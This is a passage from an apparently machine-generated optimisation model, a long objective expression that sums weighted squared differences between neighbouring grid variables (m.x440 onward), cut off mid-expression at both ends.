3.48987601495026*((8.11690209768664*m.x440 - 8.11690209768664*m.x467)**2 + (1.3*m.x466 - 1.3*
m.x467)**2) + 3.48987601495026*((8.11690209768664*m.x441 - 8.11690209768664*m.x468)**2 + (1.3*
m.x467 - 1.3*m.x468)**2) + 3.48987601495026*((8.11690209768664*m.x442 - 8.11690209768664*m.x469)
**2 + (1.3*m.x468 - 1.3*m.x469)**2) + 3.48987601495026*((8.11690209768664*m.x443 -
8.11690209768664*m.x470)**2 + (1.3*m.x469 - 1.3*m.x470)**2) + 3.48987601495026*((8.11690209768664
*m.x444 - 8.11690209768664*m.x471)**2 + (1.3*m.x470 - 1.3*m.x471)**2) + 3.48987601495026*((
8.11690209768664*m.x445 - 8.11690209768664*m.x472)**2 + (1.3*m.x471 - 1.3*m.x472)**2) +
3.48987601495026*((8.11690209768664*m.x446 - 8.11690209768664*m.x473)**2 + (1.3*m.x472 - 1.3*
m.x473)**2) + 3.48987601495026*((8.11690209768664*m.x447 - 8.11690209768664*m.x474)**2 + (1.3*
m.x473 - 1.3*m.x474)**2) + 3.48987601495026*((8.11690209768664*m.x448 - 8.11690209768664*m.x475)
**2 + (1.3*m.x474 - 1.3*m.x475)**2) + 3.48987601495026*((8.11690209768664*m.x449 -
8.11690209768664*m.x476)**2 + (1.3*m.x475 - 1.3*m.x476)**2) + 3.48987601495026*((8.11690209768664
*m.x450 - 8.11690209768664*m.x477)**2 + (1.3*m.x476 - 1.3*m.x477)**2) + 3.48987601495026*((
8.11690209768664*m.x451 - 8.11690209768664*m.x478)**2 + (1.3*m.x477 - 1.3*m.x478)**2) +
3.48987601495026*((8.11690209768664*m.x452 - 8.11690209768664*m.x479)**2 + (1.3*m.x478 - 1.3*
m.x479)**2) + 3.48987601495026*((8.11690209768664*m.x453 - 8.11690209768664*m.x480)**2 + (1.3*
m.x479 - 1.3*m.x480)**2) + 3.48987601495026*((8.11690209768664*m.x454 - 8.11690209768664*m.x481)
**2 + (1.3*m.x480 - 1.3*m.x481)**2) + 3.48987601495026*((8.11690209768664*m.x455 -
8.11690209768664*m.x482)**2 + (1.3*m.x481 - 1.3*m.x482)**2) + 3.48987601495026*((8.11690209768664
*m.x456 - 8.11690209768664*m.x483)**2 + (1.3*m.x482 - 1.3*m.x483)**2) + 3.48987601495026*((
8.11690209768664*m.x457 - 8.11690209768664*m.x484)**2 + (1.3*m.x483 - 1.3*m.x484)**2) +
3.48987601495026*((8.11690209768664*m.x458 - 8.11690209768664*m.x485)**2 + (1.3*m.x484 - 1.3*
m.x485)**2) + 3.48987601495026*((8.11690209768664*m.x459 - 8.11690209768664*m.x486)**2 + (1.3*
m.x485 - 1.3*m.x486)**2) + 3.37452161263041*((8.11690209768664*m.x461 - 8.11690209768664*m.x488)
**2 + (1.3*m.x487 - 1.3*m.x488)**2) + 3.37452161263041*((8.11690209768664*m.x462 -
8.11690209768664*m.x489)**2 + (1.3*m.x488 - 1.3*m.x489)**2) + 3.37452161263041*((8.11690209768664
*m.x463 - 8.11690209768664*m.x490)**2 + (1.3*m.x489 - 1.3*m.x490)**2) + 3.37452161263041*((
8.11690209768664*m.x464 - 8.11690209768664*m.x491)**2 + (1.3*m.x490 - 1.3*m.x491)**2) +
3.37452161263041*((8.11690209768664*m.x465 - 8.11690209768664*m.x492)**2 + (1.3*m.x491 - 1.3*
m.x492)**2) + 3.37452161263041*((8.11690209768664*m.x466 - 8.11690209768664*m.x493)**2 + (1.3*
m.x492 - 1.3*m.x493)**2) + 3.37452161263041*((8.11690209768664*m.x467 - 8.11690209768664*m.x494)
**2 + (1.3*m.x493 - 1.3*m.x494)**2) + 3.37452161263041*((8.11690209768664*m.x468 -
8.11690209768664*m.x495)**2 + (1.3*m.x494 - 1.3*m.x495)**2) + 3.37452161263041*((8.11690209768664
*m.x469 - 8.11690209768664*m.x496)**2 + (1.3*m.x495 - 1.3*m.x496)**2) + 3.37452161263041*((
8.11690209768664*m.x470 - 8.11690209768664*m.x497)**2 + (1.3*m.x496 - 1.3*m.x497)**2) +
3.37452161263041*((8.11690209768664*m.x471 - 8.11690209768664*m.x498)**2 + (1.3*m.x497 - 1.3*
m.x498)**2) + 3.37452161263041*((8.11690209768664*m.x472 - 8.11690209768664*m.x499)**2 + (1.3*
m.x498 - 1.3*m.x499)**2) + 3.37452161263041*((8.11690209768664*m.x473 - 8.11690209768664*m.x500)
**2 + (1.3*m.x499 - 1.3*m.x500)**2) + 3.37452161263041*((8.11690209768664*m.x474 -
8.11690209768664*m.x501)**2 + (1.3*m.x500 - 1.3*m.x501)**2) + 3.37452161263041*((8.11690209768664
*m.x475 - 8.11690209768664*m.x502)**2 + (1.3*m.x501 - 1.3*m.x502)**2) + 3.37452161263041*((
8.11690209768664*m.x476 - 8.11690209768664*m.x503)**2 + (1.3*m.x502 - 1.3*m.x503)**2) +
3.37452161263041*((8.11690209768664*m.x477 - 8.11690209768664*m.x504)**2 + (1.3*m.x503 - 1.3*
m.x504)**2) + 3.37452161263041*((8.11690209768664*m.x478 - 8.11690209768664*m.x505)**2 + (1.3*
m.x504 - 1.3*m.x505)**2) + 3.37452161263041*((8.11690209768664*m.x479 - 8.11690209768664*m.x506)
**2 + (1.3*m.x505 - 1.3*m.x506)**2) + 3.37452161263041*((8.11690209768664*m.x480 -
8.11690209768664*m.x507)**2 + (1.3*m.x506 - 1.3*m.x507)**2) + 3.37452161263041*((8.11690209768664
*m.x481 - 8.11690209768664*m.x508)**2 + (1.3*m.x507 - 1.3*m.x508)**2) + 3.37452161263041*((
8.11690209768664*m.x482 - 8.11690209768664*m.x509)**2 + (1.3*m.x508 - 1.3*m.x509)**2) +
3.37452161263041*((8.11690209768664*m.x483 - 8.11690209768664*m.x510)**2 + (1.3*m.x509 - 1.3*
m.x510)**2) + 3.37452161263041*((8.11690209768664*m.x484 - 8.11690209768664*m.x511)**2 + (1.3*
m.x510 - 1.3*m.x511)**2) + 3.37452161263041*((8.11690209768664*m.x485 - 8.11690209768664*m.x512)
**2 + (1.3*m.x511 - 1.3*m.x512)**2) + 3.37452161263041*((8.11690209768664*m.x486 -
8.11690209768664*m.x513)**2 + (1.3*m.x512 - 1.3*m.x513)**2) + 3.27049269683564*((8.11690209768664
*m.x488 - 8.11690209768664*m.x515)**2 + (1.3*m.x514 - 1.3*m.x515)**2) + 3.27049269683564*((
8.11690209768664*m.x489 - 8.11690209768664*m.x516)**2 + (1.3*m.x515 - 1.3*m.x516)**2) +
3.27049269683564*((8.11690209768664*m.x490 - 8.11690209768664*m.x517)**2 + (1.3*m.x516 - 1.3*
m.x517)**2) + 3.27049269683564*((8.11690209768664*m.x491 - 8.11690209768664*m.x518)**2 + (1.3*
m.x517 - 1.3*m.x518)**2) + 3.27049269683564*((8.11690209768664*m.x492 - 8.11690209768664*m.x519)
**2 + (1.3*m.x518 - 1.3*m.x519)**2) + 3.27049269683564*((8.11690209768664*m.x493 -
8.11690209768664*m.x520)**2 + (1.3*m.x519 - 1.3*m.x520)**2) + 3.27049269683564*((8.11690209768664
*m.x494 - 8.11690209768664*m.x521)**2 + (1.3*m.x520 - 1.3*m.x521)**2) + 3.27049269683564*((
8.11690209768664*m.x495 - 8.11690209768664*m.x522)**2 + (1.3*m.x521 - 1.3*m.x522)**2) +
3.27049269683564*((8.11690209768664*m.x496 - 8.11690209768664*m.x523)**2 + (1.3*m.x522 - 1.3*
m.x523)**2) + 3.27049269683564*((8.11690209768664*m.x497 - 8.11690209768664*m.x524)**2 + (1.3*
m.x523 - 1.3*m.x524)**2) + 3.27049269683564*((8.11690209768664*m.x498 - 8.11690209768664*m.x525)
**2 + (1.3*m.x524 - 1.3*m.x525)**2) + 3.27049269683564*((8.11690209768664*m.x499 -
8.11690209768664*m.x526)**2 + (1.3*m.x525 - 1.3*m.x526)**2) + 3.27049269683564*((8.11690209768664
*m.x500 - 8.11690209768664*m.x527)**2 + (1.3*m.x526 - 1.3*m.x527)**2) + 3.27049269683564*((
8.11690209768664*m.x501 - 8.11690209768664*m.x528)**2 + (1.3*m.x527 - 1.3*m.x528)**2) +
3.27049269683564*((8.11690209768664*m.x502 - 8.11690209768664*m.x529)**2 + (1.3*m.x528 - 1.3*
m.x529)**2) + 3.27049269683564*((8.11690209768664*m.x503 - 8.11690209768664*m.x530)**2 + (1.3*
m.x529 - 1.3*m.x530)**2) + 3.27049269683564*((8.11690209768664*m.x504 - 8.11690209768664*m.x531)
**2 + (1.3*m.x530 - 1.3*m.x531)**2) + 3.27049269683564*((8.11690209768664*m.x505 -
8.11690209768664*m.x532)**2 + (1.3*m.x531 - 1.3*m.x532)**2) + 3.27049269683564*((8.11690209768664
*m.x506 - 8.11690209768664*m.x533)**2 + (1.3*m.x532 - 1.3*m.x533)**2) + 3.27049269683564*((
8.11690209768664*m.x507 - 8.11690209768664*m.x534)**2 + (1.3*m.x533 - 1.3*m.x534)**2) +
3.27049269683564*((8.11690209768664*m.x508 - 8.11690209768664*m.x535)**2 + (1.3*m.x534 - 1.3*
m.x535)**2) + 3.27049269683564*((8.11690209768664*m.x509 - 8.11690209768664*m.x536)**2 + (1.3*
m.x535 - 1.3*m.x536)**2) + 3.27049269683564*((8.11690209768664*m.x510 - 8.11690209768664*m.x537)
**2 + (1.3*m.x536 - 1.3*m.x537)**2) + 3.27049269683564*((8.11690209768664*m.x511 -
8.11690209768664*m.x538)**2 + (1.3*m.x537 - 1.3*m.x538)**2) + 3.27049269683564*((8.11690209768664
*m.x512 - 8.11690209768664*m.x539)**2 + (1.3*m.x538 - 1.3*m.x539)**2) + 3.27049269683564*((
8.11690209768664*m.x513 - 8.11690209768664*m.x540)**2 + (1.3*m.x539 - 1.3*m.x540)**2) +
3.17874498030211*((8.11690209768664*m.x515 - 8.11690209768664*m.x542)**2 + (1.3*m.x541 - 1.3*
m.x542)**2) + 3.17874498030211*((8.11690209768664*m.x516 - 8.11690209768664*m.x543)**2 + (1.3*
m.x542 - 1.3*m.x543)**2) + 3.17874498030211*((8.11690209768664*m.x517 - 8.11690209768664*m.x544)
**2 + (1.3*m.x543 - 1.3*m.x544)**2) + 3.17874498030211*((8.11690209768664*m.x518 -
8.11690209768664*m.x545)**2 + (1.3*m.x544 - 1.3*m.x545)**2) + 3.17874498030211*((8.11690209768664
*m.x519 - 8.11690209768664*m.x546)**2 + (1.3*m.x545 - 1.3*m.x546)**2) + 3.17874498030211*((
8.11690209768664*m.x520 - 8.11690209768664*m.x547)**2 + (1.3*m.x546 - 1.3*m.x547)**2) +
3.17874498030211*((8.11690209768664*m.x521 - 8.11690209768664*m.x548)**2 + (1.3*m.x547 - 1.3*
m.x548)**2) + 3.17874498030211*((8.11690209768664*m.x522 - 8.11690209768664*m.x549)**2 + (1.3*
m.x548 - 1.3*m.x549)**2) + 3.17874498030211*((8.11690209768664*m.x523 - 8.11690209768664*m.x550)
**2 + (1.3*m.x549 - 1.3*m.x550)**2) + 3.17874498030211*((8.11690209768664*m.x524 -
8.11690209768664*m.x551)**2 + (1.3*m.x550 - 1.3*m.x551)**2) + 3.17874498030211*((8.11690209768664
*m.x525 - 8.11690209768664*m.x552)**2 + (1.3*m.x551 - 1.3*m.x552)**2) + 3.17874498030211*((
8.11690209768664*m.x526 - 8.11690209768664*m.x553)**2 + (1.3*m.x552 - 1.3*m.x553)**2) +
3.17874498030211*((8.11690209768664*m.x527 - 8.11690209768664*m.x554)**2 + (1.3*m.x553 - 1.3*
m.x554)**2) + 3.17874498030211*((8.11690209768664*m.x528 - 8.11690209768664*m.x555)**2 + (1.3*
m.x554 - 1.3*m.x555)**2) + 3.17874498030211*((8.11690209768664*m.x529 - 8.11690209768664*m.x556)
**2 + (1.3*m.x555 - 1.3*m.x556)**2) + 3.17874498030211*((8.11690209768664*m.x530 -
8.11690209768664*m.x557)**2 + (1.3*m.x556 - 1.3*m.x557)**2) + 3.17874498030211*((8.11690209768664
*m.x531 - 8.11690209768664*m.x558)**2 + (1.3*m.x557 - 1.3*m.x558)**2) + 3.17874498030211*((
8.11690209768664*m.x532 - 8.11690209768664*m.x559)**2 + (1.3*m.x558 - 1.3*m.x559)**2) +
3.17874498030211*((8.11690209768664*m.x533 - 8.11690209768664*m.x560)**2 + (1.3*m.x559 - 1.3*
m.x560)**2) + 3.17874498030211*((8.11690209768664*m.x534 - 8.11690209768664*m.x561)**2 + (1.3*
m.x560 - 1.3*m.x561)**2) + 3.17874498030211*((8.11690209768664*m.x535 - 8.11690209768664*m.x562)
**2 + (1.3*m.x561 - 1.3*m.x562)**2) + 3.17874498030211*((8.11690209768664*m.x536 -
8.11690209768664*m.x563)**2 + (1.3*m.x562 - 1.3*m.x563)**2) + 3.17874498030211*((8.11690209768664
*m.x537 - 8.11690209768664*m.x564)**2 + (1.3*m.x563 - 1.3*m.x564)**2) + 3.17874498030211*((
8.11690209768664*m.x538 - 8.11690209768664*m.x565)**2 + (1.3*m.x564 - 1.3*m.x565)**2) +
3.17874498030211*((8.11690209768664*m.x539 - 8.11690209768664*m.x566)**2 + (1.3*m.x565 - 1.3*
m.x566)**2) + 3.17874498030211*((8.11690209768664*m.x540 - 8.11690209768664*m.x567)**2 + (1.3*
m.x566 - 1.3*m.x567)**2) + 3.10003657380855*((8.11690209768664*m.x542 - 8.11690209768664*m.x569)
**2 + (1.3*m.x568 - 1.3*m.x569)**2) + 3.10003657380855*((8.11690209768664*m.x543 -
8.11690209768664*m.x570)**2 + (1.3*m.x569 - 1.3*m.x570)**2) + 3.10003657380855*((8.11690209768664
*m.x544 - 8.11690209768664*m.x571)**2 + (1.3*m.x570 - 1.3*m.x571)**2) + 3.10003657380855*((
8.11690209768664*m.x545 - 8.11690209768664*m.x572)**2 + (1.3*m.x571 - 1.3*m.x572)**2) +
3.10003657380855*((8.11690209768664*m.x546 - 8.11690209768664*m.x573)**2 + (1.3*m.x572 - 1.3*
m.x573)**2) + 3.10003657380855*((8.11690209768664*m.x547 - 8.11690209768664*m.x574)**2 + (1.3*
m.x573 - 1.3*m.x574)**2) + 3.10003657380855*((8.11690209768664*m.x548 - 8.11690209768664*m.x575)
**2 + (1.3*m.x574 - 1.3*m.x575)**2) + 3.10003657380855*((8.11690209768664*m.x549 -
8.11690209768664*m.x576)**2 + (1.3*m.x575 - 1.3*m.x576)**2) + 3.10003657380855*((8.11690209768664
*m.x550 - 8.11690209768664*m.x577)**2 + (1.3*m.x576 - 1.3*m.x577)**2) + 3.10003657380855*((
8.11690209768664*m.x551 - 8.11690209768664*m.x578)**2 + (1.3*m.x577 - 1.3*m.x578)**2) +
3.10003657380855*((8.11690209768664*m.x552 - 8.11690209768664*m.x579)**2 + (1.3*m.x578 - 1.3*
m.x579)**2) + 3.10003657380855*((8.11690209768664*m.x553 - 8.11690209768664*m.x580)**2 + (1.3*
m.x579 - 1.3*m.x580)**2) + 3.10003657380855*((8.11690209768664*m.x554 - 8.11690209768664*m.x581)
**2 + (1.3*m.x580 - 1.3*m.x581)**2) + 3.10003657380855*((8.11690209768664*m.x555 -
8.11690209768664*m.x582)**2 + (1.3*m.x581 - 1.3*m.x582)**2) + 3.10003657380855*((8.11690209768664
*m.x556 - 8.11690209768664*m.x583)**2 + (1.3*m.x582 - 1.3*m.x583)**2) + 3.10003657380855*((
8.11690209768664*m.x557 - 8.11690209768664*m.x584)**2 + (1.3*m.x583 - 1.3*m.x584)**2) +
3.10003657380855*((8.11690209768664*m.x558 - 8.11690209768664*m.x585)**2 + (1.3*m.x584 - 1.3*
m.x585)**2) + 3.10003657380855*((8.11690209768664*m.x559 - 8.11690209768664*m.x586)**2 + (1.3*
m.x585 - 1.3*m.x586)**2) + 3.10003657380855*((8.11690209768664*m.x560 - 8.11690209768664*m.x587)
**2 + (1.3*m.x586 - 1.3*m.x587)**2) + 3.10003657380855*((8.11690209768664*m.x561 -
8.11690209768664*m.x588)**2 + (1.3*m.x587 - 1.3*m.x588)**2) + 3.10003657380855*((8.11690209768664
*m.x562 - 8.11690209768664*m.x589)**2 + (1.3*m.x588 - 1.3*m.x589)**2) + 3.10003657380855*((
8.11690209768664*m.x563 - 8.11690209768664*m.x590)**2 + (1.3*m.x589 - 1.3*m.x590)**2) +
3.10003657380855*((8.11690209768664*m.x564 - 8.11690209768664*m.x591)**2 + (1.3*m.x590 - 1.3*
m.x591)**2) + 3.10003657380855*((8.11690209768664*m.x565 - 8.11690209768664*m.x592)**2 + (1.3*
m.x591 - 1.3*m.x592)**2) + 3.10003657380855*((8.11690209768664*m.x566 - 8.11690209768664*m.x593)
**2 + (1.3*m.x592 - 1.3*m.x593)**2) + 3.10003657380855*((8.11690209768664*m.x567 -
8.11690209768664*m.x594)**2 + (1.3*m.x593 - 1.3*m.x594)**2) + 3.03495253422331*((8.11690209768664
*m.x569 - 8.11690209768664*m.x596)**2 + (1.3*m.x595 - 1.3*m.x596)**2) + 3.03495253422331*((
8.11690209768664*m.x570 - 8.11690209768664*m.x597)**2 + (1.3*m.x596 - 1.3*m.x597)**2) +
3.03495253422331*((8.11690209768664*m.x571 - 8.11690209768664*m.x598)**2 + (1.3*m.x597 - 1.3*
m.x598)**2) + 3.03495253422331*((8.11690209768664*m.x572 - 8.11690209768664*m.x599)**2 + (1.3*
m.x598 - 1.3*m.x599)**2) + 3.03495253422331*((8.11690209768664*m.x573 - 8.11690209768664*m.x600)
**2 + (1.3*m.x599 - 1.3*m.x600)**2) + 3.03495253422331*((8.11690209768664*m.x574 -
8.11690209768664*m.x601)**2 + (1.3*m.x600 - 1.3*m.x601)**2) + 3.03495253422331*((8.11690209768664
*m.x575 - 8.11690209768664*m.x602)**2 + (1.3*m.x601 - 1.3*m.x602)**2) + 3.03495253422331*((
8.11690209768664*m.x576 - 8.11690209768664*m.x603)**2 + (1.3*m.x602 - 1.3*m.x603)**2) +
3.03495253422331*((8.11690209768664*m.x577 - 8.11690209768664*m.x604)**2 + (1.3*m.x603 - 1.3*
m.x604)**2) + 3.03495253422331*((8.11690209768664*m.x578 - 8.11690209768664*m.x605)**2 + (1.3*
m.x604 - 1.3*m.x605)**2) + 3.03495253422331*((8.11690209768664*m.x579 - 8.11690209768664*m.x606)
**2 + (1.3*m.x605 - 1.3*m.x606)**2) + 3.03495253422331*((8.11690209768664*m.x580 -
8.11690209768664*m.x607)**2 + (1.3*m.x606 - 1.3*m.x607)**2) + 3.03495253422331*((8.11690209768664
*m.x581 - 8.11690209768664*m.x608)**2 + (1.3*m.x607 - 1.3*m.x608)**2) + 3.03495253422331*((
8.11690209768664*m.x582 - 8.11690209768664*m.x609)**2 + (1.3*m.x608 - 1.3*m.x609)**2) +
3.03495253422331*((8.11690209768664*m.x583 - 8.11690209768664*m.x610)**2 + (1.3*m.x609 - 1.3*
m.x610)**2) + 3.03495253422331*((8.11690209768664*m.x584 - 8.11690209768664*m.x611)**2 + (1.3*
m.x610 - 1.3*m.x611)**2) + 3.03495253422331*((8.11690209768664*m.x585 - 8.11690209768664*m.x612)
**2 + (1.3*m.x611 - 1.3*m.x612)**2) + 3.03495253422331*((8.11690209768664*m.x586 -
8.11690209768664*m.x613)**2 + (1.3*m.x612 - 1.3*m.x613)**2) + 3.03495253422331*((8.11690209768664
*m.x587 - 8.11690209768664*m.x614)**2 + (1.3*m.x613 - 1.3*m.x614)**2) + 3.03495253422331*((
8.11690209768664*m.x588 - 8.11690209768664*m.x615)**2 + (1.3*m.x614 - 1.3*m.x615)**2) +
3.03495253422331*((8.11690209768664*m.x589 - 8.11690209768664*m.x616)**2 + (1.3*m.x615 - 1.3*
m.x616)**2) + 3.03495253422331*((8.11690209768664*m.x590 - 8.11690209768664*m.x617)**2 + (1.3*
m.x616 - 1.3*m.x617)**2) + 3.03495253422331*((8.11690209768664*m.x591 - 8.11690209768664*m.x618)
**2 + (1.3*m.x617 - 1.3*m.x618)**2) + 3.03495253422331*((8.11690209768664*m.x592 -
8.11690209768664*m.x619)**2 + (1.3*m.x618 - 1.3*m.x619)**2) + 3.03495253422331*((8.11690209768664
*m.x593 - 8.11690209768664*m.x620)**2 + (1.3*m.x619 - 1.3*m.x620)**2) + 3.03495253422331*((
8.11690209768664*m.x594 - 8.11690209768664*m.x621)**2 + (1.3*m.x620 - 1.3*m.x621)**2) +
2.98392983330721*((8.11690209768664*m.x596 - 8.11690209768664*m.x623)**2 + (1.3*m.x622 - 1.3*
m.x623)**2) + 2.98392983330721*((8.11690209768664*m.x597 - 8.11690209768664*m.x624)**2 + (1.3*
m.x623 - 1.3*m.x624)**2) + 2.98392983330721*((8.11690209768664*m.x598 - 8.11690209768664*m.x625)
**2 + (1.3*m.x624 - 1.3*m.x625)**2) + 2.98392983330721*((8.11690209768664*m.x599 -
8.11690209768664*m.x626)**2 + (1.3*m.x625 - 1.3*m.x626)**2) + 2.98392983330721*((8.11690209768664
*m.x600 - 8.11690209768664*m.x627)**2 + (1.3*m.x626 - 1.3*m.x627)**2) + 2.98392983330721*((
8.11690209768664*m.x601 - 8.11690209768664*m.x628)**2 + (1.3*m.x627 - 1.3*m.x628)**2) +
2.98392983330721*((8.11690209768664*m.x602 - 8.11690209768664*m.x629)**2 + (1.3*m.x628 - 1.3*
m.x629)**2) + 2.98392983330721*((8.11690209768664*m.x603 - 8.11690209768664*m.x630)**2 + (1.3*
m.x629 - 1.3*m.x630)**2) + 2.98392983330721*((8.11690209768664*m.x604 - 8.11690209768664*m.x631)
**2 + (1.3*m.x630 - 1.3*m.x631)**2) + 2.98392983330721*((8.11690209768664*m.x605 -
8.11690209768664*m.x632)**2 + (1.3*m.x631 - 1.3*m.x632)**2) + 2.98392983330721*((8.11690209768664
*m.x606 - 8.11690209768664*m.x633)**2 + (1.3*m.x632 - 1.3*m.x633)**2) + 2.98392983330721*((
8.11690209768664*m.x607 - 8.11690209768664*m.x634)**2 + (1.3*m.x633 - 1.3*m.x634)**2) +
2.98392983330721*((8.11690209768664*m.x608 - 8.11690209768664*m.x635)**2 + (1.3*m.x634 - 1.3*
m.x635)**2) + 2.98392983330721*((8.11690209768664*m.x609 - 8.11690209768664*m.x636)**2 + (1.3*
m.x635 - 1.3*m.x636)**2) + 2.98392983330721*((8.11690209768664*m.x610 - 8.11690209768664*m.x637)
**2 + (1.3*m.x636 - 1.3*m.x637)**2) + 2.98392983330721*((8.11690209768664*m.x611 -
8.11690209768664*m.x638)**2 + (1.3*m.x637 - 1.3*m.x638)**2) + 2.98392983330721*((8.11690209768664
*m.x612 - 8.11690209768664*m.x639)**2 + (1.3*m.x638 - 1.3*m.x639)**2) + 2.98392983330721*((
8.11690209768664*m.x613 - 8.11690209768664*m.x640)**2 + (1.3*m.x639 - 1.3*m.x640)**2) +
2.98392983330721*((8.11690209768664*m.x614 - 8.11690209768664*m.x641)**2 + (1.3*m.x640 - 1.3*
m.x641)**2) + 2.98392983330721*((8.11690209768664*m.x615 - 8.11690209768664*m.x642)**2 + (1.3*
m.x641 - 1.3*m.x642)**2) + 2.98392983330721*((8.11690209768664*m.x616 - 8.11690209768664*m.x643)
**2 + (1.3*m.x642 - 1.3*m.x643)**2) + 2.98392983330721*((8.11690209768664*m.x617 -
8.11690209768664*m.x644)**2 + (1.3*m.x643 - 1.3*m.x644)**2) + 2.98392983330721*((8.11690209768664
*m.x618 - 8.11690209768664*m.x645)**2 + (1.3*m.x644 - 1.3*m.x645)**2) + 2.98392983330721*((
8.11690209768664*m.x619 - 8.11690209768664*m.x646)**2 + (1.3*m.x645 - 1.3*m.x646)**2) +
2.98392983330721*((8.11690209768664*m.x620 - 8.11690209768664*m.x647)**2 + (1.3*m.x646 - 1.3*
m.x647)**2) + 2.98392983330721*((8.11690209768664*m.x621 - 8.11690209768664*m.x648)**2 + (1.3*
m.x647 - 1.3*m.x648)**2) + 2.94728071564996*((8.11690209768664*m.x623 - 8.11690209768664*m.x650)
**2 + (1.3*m.x649 - 1.3*m.x650)**2) + 2.94728071564996*((8.11690209768664*m.x624 -
8.11690209768664*m.x651)**2 + (1.3*m.x650 - 1.3*m.x651)**2) + 2.94728071564996*((8.11690209768664
*m.x625 - 8.11690209768664*m.x652)**2 + (1.3*m.x651 - 1.3*m.x652)**2) + 2.94728071564996*((
8.11690209768664*m.x626 - 8.11690209768664*m.x653)**2 + (1.3*m.x652 - 1.3*m.x653)**2) +
2.94728071564996*((8.11690209768664*m.x627 - 8.11690209768664*m.x654)**2 + (1.3*m.x653 - 1.3*
m.x654)**2) + 2.94728071564996*((8.11690209768664*m.x628 - 8.11690209768664*m.x655)**2 + (1.3*
m.x654 - 1.3*m.x655)**2) + 2.94728071564996*((8.11690209768664*m.x629 - 8.11690209768664*m.x656)
**2 + (1.3*m.x655 - 1.3*m.x656)**2) + 2.94728071564996*((8.11690209768664*m.x630 -
8.11690209768664*m.x657)**2 + (1.3*m.x656 - 1.3*m.x657)**2) + 2.94728071564996*((8.11690209768664
*m.x631 - 8.11690209768664*m.x658)**2 + (1.3*m.x657 - 1.3*m.x658)**2) + 2.94728071564996*((
8.11690209768664*m.x632 - 8.11690209768664*m.x659)**2 + (1.3*m.x658 - 1.3*m.x659)**2) +
2.94728071564996*((8.11690209768664*m.x633 - 8.11690209768664*m.x660)**2 + (1.3*m.x659 - 1.3*
m.x660)**2) + 2.94728071564996*((8.11690209768664*m.x634 - 8.11690209768664*m.x661)**2 + (1.3*
m.x660 - 1.3*m.x661)**2) + 2.94728071564996*((8.11690209768664*m.x635 - 8.11690209768664*m.x662)
**2 + (1.3*m.x661 - 1.3*m.x662)**2) + 2.94728071564996*((8.11690209768664*m.x636 -
8.11690209768664*m.x663)**2 + (1.3*m.x662 - 1.3*m.x663)**2) + 2.94728071564996*((8.11690209768664
*m.x637 - 8.11690209768664*m.x664)**2 + (1.3*m.x663 - 1.3*m.x664)**2) + 2.94728071564996*((
8.11690209768664*m.x638 - 8.11690209768664*m.x665)**2 + (1.3*m.x664 - 1.3*m.x665)**2) +
2.94728071564996*((8.11690209768664*m.x639 - 8.11690209768664*m.x666)**2 + (1.3*m.x665 - 1.3*
m.x666)**2) + 2.94728071564996*((8.11690209768664*m.x640 - 8.11690209768664*m.x667)**2 + (1.3*
m.x666 - 1.3*m.x667)**2) + 2.94728071564996*((8.11690209768664*m.x641 - 8.11690209768664*m.x668)
**2 + (1.3*m.x667 - 1.3*m.x668)**2) + 2.94728071564996*((8.11690209768664*m.x642 -
8.11690209768664*m.x669)**2 + (1.3*m.x668 - 1.3*m.x669)**2) + 2.94728071564996*((8.11690209768664
*m.x643 - 8.11690209768664*m.x670)**2 + (1.3*m.x669 - 1.3*m.x670)**2) + 2.94728071564996*((
8.11690209768664*m.x644 - 8.11690209768664*m.x671)**2 + (1.3*m.x670 - 1.3*m.x671)**2) +
2.94728071564996*((8.11690209768664*m.x645 - 8.11690209768664*m.x672)**2 + (1.3*m.x671 - 1.3*
m.x672)**2) + 2.94728071564996*((8.11690209768664*m.x646 - 8.11690209768664*m.x673)**2 + (1.3*
m.x672 - 1.3*m.x673)**2) + 2.94728071564996*((8.11690209768664*m.x647 - 8.11690209768664*m.x674)
**2 + (1.3*m.x673 - 1.3*m.x674)**2) + 2.94728071564996*((8.11690209768664*m.x648 -
8.11690209768664*m.x675)**2 + (1.3*m.x674 - 1.3*m.x675)**2) + 2.92521271535938*((8.11690209768664
*m.x650 - 8.11690209768664*m.x677)**2 + (1.3*m.x676 - 1.3*m.x677)**2) + 2.92521271535938*((
8.11690209768664*m.x651 - 8.11690209768664*m.x678)**2 + (1.3*m.x677 - 1.3*m.x678)**2) +
2.92521271535938*((8.11690209768664*m.x652 - 8.11690209768664*m.x679)**2 + (1.3*m.x678 - 1.3*
m.x679)**2) + 2.92521271535938*((8.11690209768664*m.x653 - 8.11690209768664*m.x680)**2 + (1.3*
m.x679 - 1.3*m.x680)**2) + 2.92521271535938*((8.11690209768664*m.x654 - 8.11690209768664*m.x681)
**2 + (1.3*m.x680 - 1.3*m.x681)**2) + 2.92521271535938*((8.11690209768664*m.x655 -
8.11690209768664*m.x682)**2 + (1.3*m.x681 - 1.3*m.x682)**2) + 2.92521271535938*((8.11690209768664
*m.x656 - 8.11690209768664*m.x683)**2 + (1.3*m.x682 - 1.3*m.x683)**2) + 2.92521271535938*((
8.11690209768664*m.x657 - 8.11690209768664*m.x684)**2 + (1.3*m.x683 - 1.3*m.x684)**2) +
2.92521271535938*((8.11690209768664*m.x658 - 8.11690209768664*m.x685)**2 + (1.3*m.x684 - 1.3*
m.x685)**2) + 2.92521271535938*((8.11690209768664*m.x659 - 8.11690209768664*m.x686)**2 + (1.3*
m.x685 - 1.3*m.x686)**2) + 2.92521271535938*((8.11690209768664*m.x660 - 8.11690209768664*m.x687)
**2 + (1.3*m.x686 - 1.3*m.x687)**2) + 2.92521271535938*((8.11690209768664*m.x661 -
8.11690209768664*m.x688)**2 + (1.3*m.x687 - 1.3*m.x688)**2) + 2.92521271535938*((8.11690209768664
*m.x662 - 8.11690209768664*m.x689)**2 + (1.3*m.x688 - 1.3*m.x689)**2) + 2.92521271535938*((
8.11690209768664*m.x663 - 8.11690209768664*m.x690)**2 + (1.3*m.x689 - 1.3*m.x690)**2) +
2.92521271535938*((8.11690209768664*m.x664 - 8.11690209768664*m.x691)**2 + (1.3*m.x690 - 1.3*
m.x691)**2) + 2.92521271535938*((8.11690209768664*m.x665 - 8.11690209768664*m.x692)**2 + (1.3*
m.x691 - 1.3*m.x692)**2) + 2.92521271535938*((8.11690209768664*m.x666 - 8.11690209768664*m.x693)
**2 + (1.3*m.x692 - 1.3*m.x693)**2) + 2.92521271535938*((8.11690209768664*m.x667 -
8.11690209768664*m.x694)**2 + (1.3*m.x693 - 1.3*m.x694)**2) + 2.92521271535938*((8.11690209768664
